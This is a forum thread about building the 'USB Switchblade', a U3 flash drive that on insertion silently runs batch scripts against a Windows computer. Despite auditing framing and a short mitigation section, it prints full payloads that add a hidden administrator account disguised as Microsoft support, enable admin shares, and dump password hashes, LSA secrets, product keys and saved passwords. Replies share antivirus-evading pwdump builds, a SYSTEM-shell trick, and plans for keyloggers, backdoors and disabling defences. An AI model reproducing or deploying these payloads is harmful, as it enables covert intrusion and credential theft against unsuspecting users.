Jump to content

USB Switchblade Development


Recommended Posts

From Hak5 episode 2x02, fourth segment: http://www.hak5.org/archives/138

Show notes:

Most Current:

http://www.hak5.org/wiki/index.php?title=E...itchblade.22.29

Wiki page:

http://www.hak5.org/wiki/index.php?title=USB_Switchblade

Show Notes 1.0 adapted from my CFH #437 notes:

Instant USB Password Recovery Tool (The "USB Switchblade")

*Further development for this project can be found on the Hak5 forums at http://www.hak5.org/forums/viewtopic.php?t=2361<br>

In this segment we'll overview a few of Microsoft Window's security weaknesses and show how to build a custom USB key that will retrieve vital information from a target computer, necessary for auditing password strength. A major flaw in the way Windows stores password information is the use of the legacy LM, or LAN Manager hash. While this hash is based on DES encryption it is vulnerable to time-memory trade-off attacks due to it's poor implementation. Our custom USB key uses new U3 technology to automatically and invisibly retrieve these weak hashes within seconds of being inserted into the target computer. From here the LM hashes can be tested against a set of rainbow tables using the popular rainbowcrack software and audited for password strength. We will also cover password best practices and prevention methods for this type of attack.

While the above paragraph may sound daunting at first I will break it down into human terms and explain how and why this works, and what you at can do to keep more secure passwords.

Overview of weaknesses in Windows password stores

The weakness that we will be exploiting is the way in which Windows stores password information. Since Windows 95 passwords have been stored in what is known as the LM, or LAN Manager hash. This hash is based on DES encryption which is a reasonably secure hash function, however the way in which Microsoft implemented it makes it easily attacked for a few reasons.

First, the user's password is converted to all uppercase. Second the password is padded or truncated to 14 bytes. Next the password is split into two 7 byte halves and the values are used to create two DES keys with a constant ASCII string, resulting in two 8 byte values. Those two values are concatenated to form a 16 byte value, which is the LM hash.

Basically what that all means is that your password is converted to all uppercase, split into two hashes, and stored in a DES encrypted hash. This makes the hash susceptible to brute force, or in our case, Time-Memory Trade-Off attacks, which we'll get into in a few moments.

Overview of password auditing USB key

The beauty of our custom password hash retrieving USB key comes from it's unique use of U3 technology. U3 is relatively new USB flash drive technology developed by U3 LLC in cooperation with Sandisk and M-Systems. More information about U3 can be found at the website http://www.u3.com

It basically uses a portion of the flash drive's memory as a virtual CD-ROM drive. This allows the Windows autorun feature to work properly, enabling us to run programs as soon as the drive is inserted into a computer. The autorun feature does not work properly on standard USB flash drives so a U3 enabled USB flash drive is required to make this work.

In this example we are using a U3 enabled SanDisk Cruzer Micro USB Flash Drive. This drive comes with U3 software enabling the use of applications like Skype directly from the flash drive. We will need to wipe out the U3 partition on this drive and replace it with our own payload. In this case we are using a payload developed by a Hak5 community member that goes by the name of MaxDamage. Max's payload contains a visual basic script and autorun.inf file which will be flashed onto the U3 CD-ROM partition. The autorun.inf file launches the visual basic script, which in turn runs the exploit located on the normal flash drive partition invisibly.

To replace the existing U3 software on the U3 enabled SanDisk Cruizer Micro USB Flash Drive we will need two files. The LPInstaller.exe and the cruzer-autorun.iso file. Both are hosted on the www.hak5.org website and is under further development on our forums and wiki.

The LPInstaller.exe is a piece of software developed by Sandisk for updating the U3 software on the flash drive. By default it will query a special website at Sandisk, download the latest U3 software, and flash the U3 partition on the USB flash drive. Since we want to install our own software we simple need to place a file named cruzer-autorun.iso in the same directory as the LPInstaller.exe program and run it. This will replace the existing U3 software with the first part of our payload.

The second part of Max's payload are the scripts located on the normal partition of the USB flash drive. These are located within the hidden folders WIP/CMD/ and include dlls, visual basic scripts, and executables, all run from a batch file. The batch file, go.cmd, will be run invisibly upon drive insertion and run the various password hash recovery tools. The most important part of this toolkit is the PwDump tool which will retrieve the LM hashes from the local computer and save them to a log file on the normal flash drive partition within the /Documents/logfiles directory, with a file name based on the computer name with a .log extension.

This file is created by the go.cmd file invisibly upon insertion and contains the LM hashes, as well as many other pieces of information. Further clarification on instalation procedures for the password hash retrieving USB key can be found on the hak5.org website.

Overview of Time-Memory Trade-Off

Time-Memory Trade-Off, or TMTO, in terms of password cracking is a procedure used to reduce the amount of computation time needed to test hashes, normally using a lookup table. The password cracking is done by comparing the password hash, in our case the LM hash, against a table of hashes and their known plaintext equivalents. The most popular table for this type of password cracking are known as Rainbow Tables, used in conjunction with a tool called Rainbow Crack. A full explanation of Time-Memory Trade-Off and Rainbow Tables are out of the scope of this article so I encourage you to read the following articles if interested:

http://neworder.box.sk/newsread.php?newsid=13362

http://www.antsight.com/zsl/rainbowcrack/

http://en.wikipedia.org/wiki/Rainbow_table

There are many online services for comparing LM hashes against lookup tables, such as www.plain-text.info, www.md5lookup.com, and www.rainbowcrack-online.com. However in this example we will be using our own rainbow tables with the rainbow crack tool. One of the best places to obtain a set of rainbow tables is the website http://rainbowtables.shmoo.com/ operated by the Schmoo group. We will also need the rainbow crack software available from http://www.antsight.com/zsl/rainbowcrack/

Putting the tools to use

Once you have gathered the necessary tools and created your own password hash retrieving USB key using a compatible U3 enabled USB Flash Drive we can put it to use and audit our computer's password strength.

The first step is to insert the USB flash drive into a Windows computer and wait a few seconds for it to be recognized. Once recognized the payload should be run automatically and invisibly, creating a log file on the flash drive in the /documents/logfiles/ directory. From here our work is done and we can safely remove the USB flash drive. From this or another computer we can open the log file containing the LM hash and run it against our rainbow tables using the rainbow crack tool.

To do so we will copy the LM hash of the user's password we wish to audit from the log file into a new file named pwfile.txt and move it to the directory where we store our rainbow tables and rainbow crack tool.

The command to test the hash against the tables is "rcrack *.rt -f pwfile"

The rainbow crack tool will then take a few minutes to run the LM hash against our rainbow tables and display the results. If we see the password in plaintext we know that the password is weak and needs to be strengthened.

Mitigation

There are a few things that need to be explained about this method for password hash retrieval and cracking. First is that physical access is needed to the Windows computer for which we will be testing. Second is that the computer is logged in with administrative access. And third is that no anti-virus that would detect the payload is running. In our tests Symantec Corporate Anti-Virus was able to detect the pwdump tool in the payload and prevent it from running. Many other anti-virus solutions may do the same.

Now if we are successful in using this method to retrieve the LM hash and run it against our rainbow tables and find a match the next step is to strengthen the password. To do this we must understand the limitations of the LM hash.

While the LM hash may be Window's akilies heal it can easily be circumvented by two methods. First is to use a password of 15 characters or higher, which is highly recommended. For further reading on long password best practices see the following websites on pass phrases:

http://www.microsoft.com/technet/community...gmt/sm1104.mspx

http://www.fourmilab.ch/javascrypt/pass_phrase.html

It is also worth mentioning that LM hashes can be disabled entirely on a Windows 2000 or higher computer by making a simple change to the registry. For more information on preventing Windows from storing a LM hash see the following article in the Microsoft Knowledge Base: http://support.microsoft.com/kb/299656/

As an added precaution we can also disable the Windows autorun feature. More information on that procedure can be found in this Microsoft Knowledge Base article: http://support.microsoft.com/kb/q155217

For more information on any of these topics and the MaxDamage password hash retrieving payload visit the wiki at www.hak5.org/wiki/

Related Links

http://www.hak5.org

http://www.u3.com

http://neworder.box.sk/newsread.php?newsid=13362

http://www.antsight.com/zsl/rainbowcrack/

http://en.wikipedia.org/wiki/Rainbow_table

http://www.microsoft.com/technet/community...gmt/sm1104.mspx

http://www.fourmilab.ch/javascrypt/pass_phrase.html

http://support.microsoft.com/kb/299656/

http://support.microsoft.com/kb/q155217

Credits:

MaxDamage

Amish

Thinking out loud

Feel free to use the wiki for development. Possibly filed under Hak5 Labs or something. Could be a good place for the pandora hack and future projects.

Requirements

    *physical Access

    *usb port

    *autorun enabled

    *no anti-virus (might be able to fix this)

    *administrator privledges (might be able to automate system level escalation)

MaxDamage's Solution

@echo off

@if not exist Documents md Documents &gt;nul

@if not exist Documentslogfiles md Documentslogfiles &gt;nul



@echo ==================================================[Passive query bit] &gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1



@echo ==================================================[System info] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

   @echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

   @ipconfig /all &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

@echo ==================================================[END System info] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

@echo ==================================================[Enabling Admin Shares] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

   @reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters /v @AutoSharewks /t reg_dword /d 1 /f &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

@echo ==================================================[END Enabling Admin Shares] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

@echo ==================================================[Add an administrative User Account] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

   @net user /add SUPPORT_388945a1 inferno /fullname:"Microsoft Corporation Help Request" &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

   @net localgroup Administrators SUPPORT_388945a1 /add &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

   @echo MYUSER: SUPPORT_388945a1 Password: inferno &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

   @reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v SUPPORT_388945a1 /t reg_dword /d 0 /f &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

@echo ==================================================[END Add User] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

@echo ==================================================[Dump SAM] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

   @.pwdump 127.0.0.1 &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

@echo ==================================================[Dump END SAM] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1



@echo ==================================================[Dump Product Keys] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

   @.produkey /nosavereg /stext "Documentslogfiles%computername%_zzz.txt" /remote %computername% &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

   @copy Documentslogfiles%computername%* Documentslogfiles%computername%_load.log  &gt;&gt; nul

   @del /f /q "Documentslogfiles%computername%_zzz.txt"

@echo ==================================================[Dump Product Keys END] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

@echo ==================================================[Dump URL History] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

   @cscript //nologo .DUH.vbs &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

@echo ==================================================[Dump URL History] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

@echo ==================================================[Dump LSA Secrets] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

   @.pspv.exe /stext "Documentslogfiles%computername%_LSA.log" &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

   @copy Documentslogfiles%computername%* Documentslogfiles%computername%_load.log  &gt;&gt; nul

   @del /f /q "Documentslogfiles%computername%_LSA.log"

@echo ==================================================[Dump END LSA] &gt;&gt; Documentslogfiles%computername%_load.log 2&gt;&amp;1

:End

@exit

2b. Payload 1.1

This payload gathers IP information, dumps SAM, product keys, LSA secrets, network passwords, messenger passwords, and URL history.

http://www.hak5.org/releases/2x02/switchbl...1.1-payload.rar

@echo off

if not exist Documents md Documents &gt;nul

if not exist Documentslogfiles md Documentslogfiles &gt;nul

cd wipcmd &gt;nul

Echo ************************************ &gt; Documentslogfiles%computername%.log 2&gt;&amp;1

echo ***********[System info]************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

   echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

   ipconfig /all &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

echo ***********[Dump SAM]*************** &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

   .pwdump 127.0.0.1 &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

echo ***********[Dump Product Keys]****** &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

   .produkey /nosavereg /stext "Documentslogfiles%computername%_pk.log" /remote %computername% &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

   copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_pk.log* Documentslogfiles%computername%.log  &gt;&gt; nul

   del /f /q "Documentslogfiles%computername%_pk.log" &gt;nul

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

echo ***********[Dump LSA secrets]******* &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

   .pspv.exe /stext "Documentslogfiles%computername%_LSA.log" &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

   copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_lsa.log* Documentslogfiles%computername%.log  &gt;&gt; nul

   del /f /q "Documentslogfiles%computername%_lsa.log" &gt;nul

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

echo ***********[Dump Network PW]******** &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

   .netpass.exe /stext "Documentslogfiles%computername%_np.log" &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

   copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_np.log* Documentslogfiles%computername%.log  &gt;&gt; nul

   del /f /q "Documentslogfiles%computername%_np.log" &gt;nul

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

echo ***********[Dump messenger PW]******** &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

   .mspass.exe /stext "Documentslogfiles%computername%_ms.log" &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

   copy Documentslogfiles%computername%.log+Documentslogfiles%computername%_ms.log* Documentslogfiles%computername%.log  &gt;&gt; nul

   del /f /q "Documentslogfiles%computername%_ms.log" &gt;nul

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

echo ***********[Dump URL History]******* &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

Echo ************************************ &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

   cscript //nologo .DUH.vbs &gt;&gt; Documentslogfiles%computername%.log 2&gt;&amp;1

:End

exit

2c. Payload 1.2 (Pwdump update from BrainKill)

http://www.hak5.org/releases/2x02/switchbl...1.2-payload.rar

Updates either package with a version of Pwdump that is not detected by Symantec Anti-Virus.

Amish's Solution

Link to post
Share on other sites
  • Replies 581
  • Created
  • Last Reply

Top Posters In This Topic

About the password stealing thing.

It might be a good idea to try to copy over the Windows SAM file, its password database. Since the assumption is that you're already logged on as admin, chances are you can just copy the file. That's <your_windows_install_dir>system32configsam by default. Also, when you create a rescue disk, the sam file is typically copied along aswell, so if you can't get the real sam file, the one on the rescue disk might still contain valid passwords, or simply give you an idea about the passwords the various users on the system are prone to using. The rescue disk files are located in <your_windows_install_dir>repair

My main question about this USB key is if it will work when the system is running a screensaver, or if it's locked but essentially logged on by the admin user?

Link to post
Share on other sites
Ok, so id like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on irc if you have a better idea. nick == Brainkill

=====================

pwdump and its dependencies can be encrypted. Ill post links below to the programs. Standard Disclaimers Apply!

http://www.brainkill.net/hack/pwdump.exe

http://www.brainkill.net/hack/pwservice.exe

http://www.brainkill.net/hack/LsaExt.dll

=======================

Link to post
Share on other sites
Ok, so id like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on irc if you have a better idea. nick == Brainkill

=====================

pwdump and its dependencies can be encrypted. Ill post links below to the programs. Standard Disclaimers Apply!

http://www.brainkill.net/hack/pwdump.exe

http://www.brainkill.net/hack/pwservice.exe

http://www.brainkill.net/hack/LsaExt.dll

=======================

I can verify that the latest version of symantec anti-virus corporate edition with the latest updates does not detect this now. score one for brainkill!

Link to post
Share on other sites

I've been watching Hack.5 for a while now but it's my first post.

i've downloaded amish's version of the USB password recovery tool, but can't seem to figure out how to install and run properly.

I'm not very good at this kind of stuff, but i'm looking for some detailed instructions (if it's not too much to ask)

thanks!

Link to post
Share on other sites

As for not being able to run this without admin, here is my little contribution, it allows you to login as SYSTEM, after running the script, cmd.exe will show, run explorer, and there you go I hope someone can expand on it.

Code of admin.bat :

TASKKILL /F /IM "explorer.exe"

sc create testsvc binpath= "cmd /K start" type= own type= interact

sc start testsvc

del admin.bat

Link to post
Share on other sites
As for not being able to run this without admin, here is my little contribution, it allows you to login as SYSTEM, after running the script, cmd.exe will show, run explorer, and there you go I hope someone can expand on it.

Code of admin.bat :

TASKKILL /F /IM "explorer.exe"

sc create testsvc binpath= "cmd /K start" type= own type= interact

sc start testsvc

del admin.bat

That will only work using an admin acount... limited user acounts cannot create services... sorry if that felt like a kick in the balls :/

Link to post
Share on other sites

haha well in our school, we have basicly admin, teacher, and student. Teacher is limited account, and student is a limited with no privlages. You can do a net user /add username password to get a teacher accoutn (its not admin but its closer)

Link to post
Share on other sites

I haven't tried the other ones, but I noticed there's a problem with the paths in Amish's version. If you go in to all of the batch files and change all instances of the following in all of the batch files it works.

"batexe" to "" (nothing)

"nircmd.exe" to "..nircmd.exe"

"dump" to "..Dump"

I think that's everything. This reminds me of the program creddump, which does some similar stuff but not as detailed and only to a text file.

Link to post
Share on other sites

ok, here's a thought: all this on an ipod... now that's the way to be stealthy... you're just trying to listen to your music on the computer... :) and with that, comes a lot of other things you can do as well... like possibly load multiple fake disks? tell me if it's possible to do all this stuff with it? :

1. record lm hashes (obviously)

2. install backdoor (like ultravnc)

3. install a smart keylogger

4. disable firewalls/Upnp tunnel through them

5. disable antivirus/antispyware

6. install folding@home & attach to a group

7. record email, .xls, .qdb, .mny, .doc, .qdf, .eml, & .jpg from computer

and to top it all off, make a user interface to turn on and off each of the features within the install, so that you do not have to harm a computer if you do not want to. I think it would be possible, and even almost easy, seeing as all the software is already available... it's just a matter of stitching it all together in a way that works with almost every computer out there... oh, and most companies without an entire division dedicated to IT don't have administrator passwords... quite frankly, they mostly (at least in houston, tx) ask you not to password anything administrator, in hopes that they can switch outsourcing companies later on if need be. I agree with all of you that that's a bad practice, but hey, the customer gets what the customer wants, right? lol

heh, I think i just came up with the iblade

Link to post
Share on other sites

A while back I wrote a small app that keylogs and takes screenshots every 30 or so seconds in C#, and then mails them once they have reached a certain size if there is net access. It doesnt need installing, just added to the startup registry once copied to the target PC. That can be done with a tiny app very easily too, if auto run from something. You rekon that might be possible with this hack?

Link to post
Share on other sites

Stupid website had to create an account jsut to write this message.

Right so yes my soloution does NOT need U3 technology, basically you should jsut unzip it to the root of your memory stick and it shoudl work correctly.

I made ths just for my use mainly, but i sent it to darren, and he showed it. I think a quick fix was provided, but I will all more features to it in later dates, so yeah.

Basically the file runs a batch script that creates a folder called the computername in the dump folder. In there it saves the different types of files. history and stuff.

You can get more programs that you can put into the script from www.nirsoft.net

Thats it

~Amish

Sorry for the shabby coding ill update it soon, I really need to update it because school is starting :)

*EDIT*

I just tested the rar form the links darren gave and it works fine on my memory stick. its dumping the files just fine.

1passhackop5.jpg

2passhackiy2.jpg

3passhackds7.jpg

4passhacktu8.jpg

Link to post
Share on other sites
huh, just curious how difficult it would be to add a feature to this switchblade-- the capacity to copy files OFF of the computer you plug it into (e.g. documents, msn messenger logs, etc), while maintaining its stealthiness.

It wouldn't be hard to program in, but I rather like it the way it is since it's actually way more stealthy. As a systems administrator if I found that this happened on my network I could check traffic logs and possibly find the drop site that the cracker used.

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.


×
×
  • Create New...